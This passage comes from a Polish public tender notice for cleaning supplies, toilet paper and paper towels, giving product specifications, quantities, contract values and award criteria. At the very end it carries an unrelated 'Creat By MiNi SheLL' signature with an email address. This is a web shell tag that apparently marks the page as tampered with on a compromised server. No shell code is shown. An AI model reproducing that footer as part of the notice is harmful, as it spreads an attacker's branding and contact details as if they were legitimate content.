ochronną. Skład: 2-5% kwas sulfamidowy, kompozycja zapachowa, (opakowanie = 750 ml)	opakowanie	1 16013	"Płyn do mycia glazury i terakoty, nie pozostawia smug i zacieków, skutecznie usuwa wszelkiego rodzaju zabrudzenia, pozostawia świeży i przyjemny zapach,(1 opakowanie = 5 l)"	opakowanie	69614	"Proszek czyszczący do powierzchni emaliowanych, ceramicznych i chromowanych w kuchni, łazience, zawierający związki wybielające na bazie chloru (podchloryn sodu).(1 opakowanie = 500 g)"	opakowanie	30115	Emulsja PCV, samopołyskowa emulsja do mycia, konserwacji i nabłyszczania podłóg z tworzyw sztucznych (tj. linoleum, gumoleum, płytek PCV itp.); zawiera naturalny wosk roślinny Carnauba, który ułatwia ponowne czyszczenie; chroni przed ścieraniem, zniszczeniem i nadmiernym zabrudzeniem; nadaje wysoki i trwały połysk bez konieczności polerowania; antystatyczna, nie wymaga stosowania zmywacza, (1 opakowanie = 5 l) opakowanie	62416	"Wysokowydajna,wodorozcieńczalna emulsja akrylowa o lakierowanym połysku do zabezpieczania parkietów i podłóg drewnianych przed ścieraniem,brudem i wilgocią.Gwarantuje trwały i wysoki połysk bez polerowania. Dodatkowo zawiera naturalne woski chroniące przed poślizgiem; PH od 7 do 9. (1 opakowanie = 1 l)"	opakowanie	80417	Pasta do podłóg w płynie. Zawiera w składzie naturalny wosk pszczeli. Charakteryzuje się bardzo dobrymi właściwościami konserwującymi oraz nabłyszczającymi. Konserwuje oraz nadaje podłogom wspaniały połysk. Posiada łagodny, przyjemny zapach miodu. Można ją stosować również do pielęgnacji podłóg z tworzyw sztucznych. (1 opakowanie = min. 400 ml) opakowanie	45018	Mleczko do czyszczenia, aktywnie usuwające brud, pozostałości po tłuszczach, nie rysujące powierzchni czyszczącej, z delikatnym środkiem ściernym, Gęstość min. 1,20 (g/cm3) Skład: anionowe środki powierzchniowo czynne 1-5%, niejonowe związki powierzchniowo czynne 1-5%, kompozycja zapachowa. ph: od 8,5 do 13 (1 opakowanie = 500 ml)	opakowanie	1 61019	"Płyn do nabłyszczania i pielęgnacji mebli w aerozolu, bez woskowy, antystatyczny, przeciw kurzowy, stosowany do drewna, mebli z płyt laminowanych, tworzyw. Bardzo dobrze usuwający kurz i delikatnie czyszczący, zabezpieczający przed szybkim osadzaniem się kurzu, nie rozmazujący się i nie zostawiający smug. Nie ulegający samozapłonowi.(1 opakowanie = min. 250 ml)"	opakowanie	75820	"Płyn do mycia i zabezpieczania powierzchni ze stali nierdzewnej, ceramicznych, chromowanych, wysokiej jakości, skutecznie czyszczący i polerujący, łatwo spłukujący się, nie zostawiający smug i zarysowań, nie niszczący mytych powierzchni. Opakowanie ze spryskiwaczem. Bardzo dobrze usuwający naloty, tłuste plamy itp. (1 opakowanie =650 ml)"	worek	53321	Płyn myjący do zmywarek gastronomicznych i przemysłowych, sprawdzający się zarówno przy wodzie twardej jak i miękkiej, do użytku profesjonalnego z zastosowaniem systemów dozujących, skoncentrowany, doskonale czyszczący szkło, porcelanę, tworzywa sztuczne odporne na alkalia, sprzęt oraz sztućce kuchenne, nie nadaje się do mycia naczyń aluminiowych. Nie pozostawia osadu na naczyniach. (1 opakowanie = 10 l)	opakowanie	10122	Środek nabłyszczający do zmywarek przemysłowych, nadający naczyniom połysk i przyspieszający proces wysychania, przeciwdziałający powstawaniu zacieków i plam po kroplach wody na umytych naczyniach, ulegający biodegradacji. (1 opakowanie = 10 l)	opakowanie	7923	Płyn do usuwania kamienia w zmywarkach i urządzeniach gastronomicznych. Skuteczny środek do usuwania kamienia wapiennego. Zapobiega jego ponownemu osadzaniu.Skuteczny w niskich temperaturach. (1 opakowanie = 10 l)	opakowanie	6224	Koncentrat do prania tapicerki meblowej oraz dywanów i wykładzin dywanowych. Niskopieniący, o przyjemnym zapachu, posiadający zastosowanie zarówno do czyszczenia ręcznego jak i do czyszczarek mechanicznych. Szybko i skutecznie usuwa brud, kurz oraz plamy. Nie zawiera rozjaśniaczy optycznych ani wybielaczy. PH od 8 do 12. (1 opakowanie = 1 l) opakowanie	14825	"Wybielacz w płynie na bazie podchlorynu sodowego ( < 5 % podchloryn sodu), do czyszczenia, wybielania i dezynfekcji.(1 opakowanie = 1 l)"	opakowanie	48126	"Odświeżacz powietrza w aerozolu o zapachu leśnym, morskim, owocowym lub kwiatowym. Szybko usuwa nieprzyjemne zapachy, pozostawiając długotrwały i świeży aromat w pomieszczeniu. (1 sztuka = min. 300 ml)"	opakowanie	1 40627	"Krem glicerynowy do rąk, o zwartej konsystencji, o właściwościach regenerujących, nawilżających i natłuszczających oraz przyjemnym zapachu(1 opakowanie = min. 100 ml)"	sztuka	52928	"Koncentrat płynu do płukania tkanin, Zapewniający trwały, długo utrzymujący się zapach, posiadający właściwości zmiękczające. Skład: 5 - 15% kationowe środki powierzchniowo czynne . Zapach perfumowany, ph: 2 - 4, wysoka rozpuszczalność w wodzie. (1 opakowanie = 2 l)"	opakowanie	36329	"Płyn do czyszczenia piekarników w pojemniku z rozpylaczem, usuwający przypalenia i zapieczenia powstałe w czasie używania piekarników, możliwość czyszczenia ""na ciepło"" i ""na zimno"", nie zawierający substancji drażniących, nie powodujący korozji (1 opakowanie = 500 ml)"	opakowanie	40630	"Płyn dezynfekujący do powierzchni, urządzeń i sprzętów kontaktujących się z żywnością w sprayu, usuwający zabrudzenia mikrobiologiczne, nie wymagający spłukiwania wodą, z atomizerem. (1 opakowanie = 600 ml)"	opakowanie	48931	"Środek do chemicznego udrożniania rur i syfonów w instalacjach kanalizacyjnych zawierający wodorotlenek sodu, w postaci żelu(1 opakowanie = 500 ml)"	opakowanie	51832	Intensywnie myjący płyn o dużej sile czyszczenia do mycia metodą spray. Bezproblemowo rozpuszcza trudne do usunięcia zabrudzenia z powierzchni odpornych na działanie rozpuszczalników. Usuwa ślady po ołówku, ołówku kopiowym, atramencie i flamastrze, pozostałości po etykietkach samoprzylepnych na wszystkich powierzchniach z tworzywa sztucznego lub pokrytych tworzywem sztucznym odpornych na działanie rozpuszczalników oraz ze stali szlachetnej, aluminium, aluminium eloksalowanego itp. (1 opakowanie = 5 l.)	opakowanie	6033	Duża ścierka przeznaczona do mycia i wycierania wszelkiego rodzaju podłóg, parkietów, płytek, paneli, podłóg z tworzywa, wielokrotnego prania, możliwość prania w wysokich temperaturach, bardzo dobrze wchłaniająca wodę, rozmiar minimalny. ~ 50 x 60 cm, microfibra, gramatura min. 250 g. Skład 80 % poliester; 20 % poliamid, sucha oraz mokra ścierka nie może przebarwiać i niszczyć czyszczonych powierzchni. Doskonale czyści bez urzycia detergentów.	opakowanie	1 15934	Druciak do garnków, wykonany ze skręconych w spiralę kawałków metalu o delikatnej strukturze, przeznaczony do czyszczenia powłok teflonowych i niklowanych, nie powodujący zarysowań, o średnicy min. 8 cm.	sztuka	1 04235	Zmywaki profilowane roz. min. 11 cm x 6,5 cm z nylonową warstwą do szorowania, wytrzymałe	sztuka	2 34636	"Rękawice gumowe,100% kauczuk naturalny, flokowane, rozmiar S, grube, odporne na uszkodzenia, wyściełane bawełną, moletowane na palcach i części chwytnej rękawicy, z długą datą przydatności, pakowane oddzielnie po jednej parze, odporne na rozciąganie oraz na detergenty i środki piorące. Normy: EN420 (1 sztuka = 1 para)"	sztuka	30537	"Rękawice gumowe,100% kauczuk naturalny, flokowane, rozmiar M, grube, odporne na uszkodzenia, wyściełane bawełną, moletowane na palcach i części chwytnej rękawicy, z długą datą przydatności, pakowane oddzielnie po jednej parze, odporne na rozciąganie oraz na detergenty i środki piorące. Normy: EN420 (1 sztuka = 1 para)"	sztuka	85538	"Rękawice gumowe,100% kauczuk naturalny, flokowane, rozmiar L, grube, odporne na uszkodzenia, wyściełane bawełną, moletowane na palcach i części chwytnej rękawicy, z długą datą przydatności, pakowane oddzielnie po jednej parze, odporne na rozciąganie oraz na detergenty i środki piorące. Normy: EN420 (1 sztuka = 1 para)"	sztuka	60139	"Rękawice gumowe,100% kauczuk naturalny, flokowane, rozmiar XL, grube, odporne na uszkodzenia, wyściełane bawełną, moletowane na palcach i części chwytnej rękawicy, z długą datą przydatności, pakowane oddzielnie po jednej parze, odporne na rozciąganie oraz na detergenty i środki piorące. Normy: EN420 (1 sztuka = 1 para)"	sztuka	38640	Szczotka do zamiatania podłogi bez kija, włosie naturalne, oprawa z drewna lakierowana, szer. min. 30 cm	sztuka	31341	Szczotka do zamiatania tzw. "zmiotka" w komplecie z szufelką, uchwyt ułatwiający korzystanie i przechowywanie, wykonana z mocnego plastiku, twarda i wytrzymała, gumowe wykończenie szufelki	sztuka	28342	Wiadro plastikowe z wyciskaczem do mopa, wytrzymałe, mocne, wyciskacz zapobiegający rozchlapywaniu się, pojemność 15 litrów, o wymiarach nie mniejszych niż wysokość: 28 cm, szerokość: 25 cm, długość: 37 cm.	komplet	11243	Mop płaski z bawełny o szerokości 100 -110 cm do zamiatania i mycia na wilgotno dużych powierzchnii. Zestaw przeznaczony do zamiatania i mycia dużych powierzchni podłogowych takich jak panele, parkiet, płytki, itp. Zestaw składa się z aluminiowego drążka o wysokości min. 120 cm, metalowego stelaża, nakładki oraz uchwytu łączącego stelaż i drążek. Część robocza nakładki do zamiatania wykonana jest z bawełny, część wierzchnia z tkaniny poliestrowej, do której przyszyte są dodatkowo 2 rzepy mocujące nakładkę na stelażu. Możliwość prania nakładki w temperaturze 60°C - wytrzymałość do 200 prań. sztuka	6444	Mop płaski z mikrofibry na stelażu o wymiarach min. 35 cm x 14 cm, z wkładem zapinanym na zatrzaski zapobiegające zsuwaniu się wkładu podczas wyciskania, w komplecie z drążkiem o długości min. 140 cm oraz wiadrem o wysokość min. 40 cm z włożoną wyciskarką. komplet	18345	Zapasowe wkłady z mikrofibry do mopa płaskiego z poz. 44 o wymiarach min. 35 cm x 14 cm, zapinane na zatrzaski zapobiegające zsuwaniu się wkładu podczas wyciskania.	komplet	43446	Profesjonalny mop paskowy z mikrofibry, wysoko chłonny i wytrzymały, do mycia i czyszczenia podłóg i posadzek o gramaturze min. 150 g sztuka	95447	Szczotka do czyszczenia WC z pojemnikiem plastikowym o wym. nie mniejszych niż: średnica podstawy 10 cm, wysokość kompletu 30 cm, kolor biały	sztuka	36948	Miotła brzozowa bez trzonka, trzykrotnie wiązana podwójnym drutem	komplet	30149	Kij do mopa/miotły, drewniany, o długości 180 cm z uniwersalnym gwintem, pasującym do szczotek z poz. 40 i oraz mopów z poz. 46.	sztuka	26750	Ścierki tetrowe, "pieluchowe", bawełniane, do sprzątania wszelkich powierzchni, na sucho i mokro, rozmiar 70x80 cm, gramatura min. 115 g/m2	sztuka	1 63051	"Serwetki gastronomiczne jednowarstwowe 15x15 cm, białe lub kolorowe(1 opakowanie = 200 sztuk)"	sztuka	56852	Wiadro plastikowe o pojemności 10 l, z grubego odpornego plastiku, z metalową rączką	opakowanie	11053	Ścierki z mikrofibry, do mycia i wycierania różnych powierzchni zmywalnych takich jak meble, sprzęty biurowe, szkło, metal itp., wielokrotnego użytku, do polerowania i usuwania kurzu, pyłu – na sucho oraz do czyszczenia silnych zabrudzeń na mokro, z możliwością czyszczenia bez użycia detergentów oraz możliwością wielokrotnego prania w pralce bez utraty właściwości czyszczących i wchłaniających wodę. Wytrzymałość min. 300 prań. Każda ścierka posiadająca wszywkę z informacją o sposobie użycia i instrukcję prania. Rozmiar nie mniejszy niż 30 cm x 30 cm, waga min. 32 g, gramatura min. 360g/m2. Skład 80 % poliester, 20 % poliamid. Suche jak i mokre ścierki nie mogą przebarwiać czyszczonych powierzchni. Ścierki nie mogą powodować zarysowań i innych uszkodzeń mytych powierzchni. (1 opakowanie = 10 sztuk)	sztuka	1 72054	"Ściereczka do szyb, wykonana z mikrofibry, wielokrotnego użytku, nie pozostawiająca smug i kłaczków, idealnie wchłaniająca wodę, brud i kurz, czyszcząca i polerująca lustra, szyby oraz wszelkie inne szklane i delikatne powierzchnie, możliwość prania w pralce, rozmiar nie mniejszy niż 32 x 32 cm o gramaturze min.125g/m2(1 opakowanie = 5 sztuk)"	opakowanie	84755	"Ściereczki gąbczaste, wzmacniane wewnętrzną siatką, bardzo chłonne, wielokrotnego użytku, przeznaczone do prac domowych, rozmiar min. 18 cm x 20 cm,(1 opakowanie = 3 sztuki)" opakowanie	26356	Uniwersalne ściereczki wiskozowe na rolce, miękkie, wytrzymałe i chłonne, do wielokrotnego użytku, oddzierane z rolki wzdłuż perforacji, wym. 25x30 cm (1 rolka = 50 sztuk) opakowanie	56957	"Rękawice winylowe zalecane są dla osób uczulonych na lateks. Rozmiar M. Jednorazowe rękawice niejałowe z winylu z rolowanym mankietem. Lekko pudrowane.wykończenie mankietu: równomiernie rolowany brzegkształt: uniwersalny, pasujący na lewa i prawą dłoń, gładka powierzchnia, gwarancja jakości 5 lat. ( 1 opakowanie = 100 szt.)"	rolka	50458	"Rękawice winylowe zalecane są dla osób uczulonych na lateks. Rozmiar L. Jednorazowe rękawice niejałowe z winylu z rolowanym mankietem. Lekko pudrowane.wykończenie mankietu: równomiernie rolowany brzegkształt: uniwersalny, pasujący na lewa i prawą dłoń, gładka powierzchnia, gwarancja jakości 5 lat. ( 1 opakowanie = 100 szt.)"	opakowanie	32659	"Rękawice winylowe zalecane są dla osób uczulonych na lateks. Rozmiar XL. Jednorazowe rękawice niejałowe z winylu z rolowanym mankietem. Lekko pudrowane.wykończenie mankietu: równomiernie rolowany brzegkształt: uniwersalny, pasujący na lewa i prawą dłoń, gładka powierzchnia, gwarancja jakości 5 lat. ( 1 opakowanie = 100 szt.)"	opakowanie	9460	" Jednorazowe ochraniacze na buty, mocna i wytrzymała folia, góra ochraniacza ściągnięta gumką, obszerne, nierozrywające się w trakcie zakładania, kolor niebieski. (1 opakowanie = 100 sztuk)"	opakowanie	3 643<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>39800000-0, 39224000-8<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: 268756,65<br/>Waluta: <br/>PLN<br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2020-11-30<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena całkowita </td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">termin realizacji zamówienia </td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">parametry techniczne</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b>Oferta musi zawierać próbki oferowanych produktów:a) mleczko do czyszczenia wymienione w poz. nr 18 załącznika nr 1b do SIWZ (1 opakowanie = 500 ml) – próbka ma umożliwić dokonanie oceny oferty w Części nr 1 „Środki czystości i artykuły do sprzątania” w kryterium nr 3 „parametry techniczne”, opisanym w rozdziale XIII punkt 2 niniejszej SIWZ;b) mydło do rąk w płynie wymienione w poz. nr 4 załącznika nr 1b do SIWZ (1 opakowanie = 5 l) – próbka ma umożliwić dokonanie oceny oferty w Części nr 1 „Środki czystości i artykuły do sprzątania” w kryterium nr 3 „parametry techniczne”, opisanym w rozdziale XIII punkt 2 niniejszej SIWZ;c) mydło sodowe toaletowe w kostce wymienione w poz. nr 5 załącznika nr 1b do SIWZ (1 sztuka = 100 g) – próbka ma umożliwić dokonanie oceny oferty w Części nr 1 „Środki czystości i artykuły do sprzątania” w kryterium nr 3 „parametry techniczne”, opisanym w rozdziale XIII punkt 2 niniejszej SIWZ;d) płyn do ręcznego mycia naczyń w postaci silnego koncentratu wymieniony w poz. nr 1 załącznika nr 1b do SIWZ (1 opakowanie = 5 l) – próbka ma umożliwić dokonanie oceny oferty w Części nr 1 „Środki czystości i artykuły do sprzątania” w kryterium nr 3 „parametry techniczne”, opisanym w rozdziale XIII punkt 2 niniejszej SIWZ;<br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Papier toaletowy i ręczniki papierowe</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1	"Papier toaletowy, kolor biały, celuloza 100%, mała rolka, wytrzymały, dwuwarstwowy, nie pylący, listkowany, dł. wstęgi min. 36Mb, szerokość 9-10 cm.,100% celuloza, gramatura papieru 36-38 g/m2, ciasno zwinięty (1 sztuka = mała rolka)"	sztuka	24 2402	"Papier toaletowy, kolor biały, 100% celuloza, duża rolka, wytrzymały, dwuwarstwowy, nie pylący, dł. wstęgi min. 100Mb, szerokość 9-10 cm., 100% celuloza,, gramatura papieru 38-40 g/m2, ciasno zwinięty(1 sztuka = duża rolka)"	sztuka	24 8303	"Ręcznik kuchenny w rolce, 100% celuloza, dwuwarstwowy, biały, min. 90 odcinków o wymiarach listka 21x23 cm, gruby i wytrzymały, (1 sztuka = 1 rolka)"	sztuka	7 5514	"Ręczniki papierowe składane typu ZZ, białe, 100 % celuloza, dwuwarstwowe, papier żywicowy, wodoutwardzony, gofrowany, kolor min. 75% białe, szerokość listka 22 cm, długość 24 cm, gramatura 38-40 g/m2, nie pylące, chłonne i wytrzymałe, nie pozostawiające nieprzyjemnego zapachu na skórze(1 opakowanie = nie mniej niż 200 listków)"	opakowanie	19 3605	"Ręcznik papierowy w rolce, średnica 19 cm, wysokość 20 cm, perforowany, długość 120 m, wysoka chłonność, bardzo wytrzymały, miękki, dwie warstwy, 100% celuloza, dopuszczany kolor: biały(1 sztuka = 1 rolka)"	sztuka	6 600<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>33760000-5, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: 172720,28<br/>Waluta: <br/>PLN<br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2020-11-30<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena całkowita</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">parametry techniczne</td><td style="border: 1px solid black;border-collapse: collapse;">21,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">termin realizacji zamówienia</td><td style="border: 1px solid black;border-collapse: collapse;">19,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b>Oferta musi zawierać próbki oferowanych produktów: a) papier toaletowy, mała rolka - wymieniony w poz. nr 1 załącznika nr 1d do SIWZ (1 sztuka = dł. wstęgi min. 36Mb) – próbka ma umożliwić dokonanie oceny oferty w Części nr 2 „Papier toaletowy i ręczniki papierowe” w kryterium nr 3 „parametry techniczne”, opisanym w rozdziale XIII punkt 2 niniejszej SIWZ; b) papier toaletowy, duża rolka - wymieniony w poz. nr 2 załącznika nr 1d do SIWZ (1 sztuka = dł. wstęgi min. 100Mb) – próbka ma umożliwić dokonanie oceny oferty w Części nr 2 „Papier toaletowy i ręczniki papierowe” w kryterium nr 3 „parametry techniczne”, opisanym w rozdziale XIII punkt 2 niniejszej SIWZ; c) ręczniki papierowe składane typu ZZ wymienione w poz. nr 4 załącznika nr 1d do SIWZ (1 opakowanie = nie mniej niż 200 listków) – próbka ma umożliwić dokonanie oceny oferty w Części nr 2 „Papier toaletowy i ręczniki papierowe” w kryterium nr 3 „parametry techniczne”, opisanym w rozdziale XIII punkt 2 niniejszej SIWZ.<br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com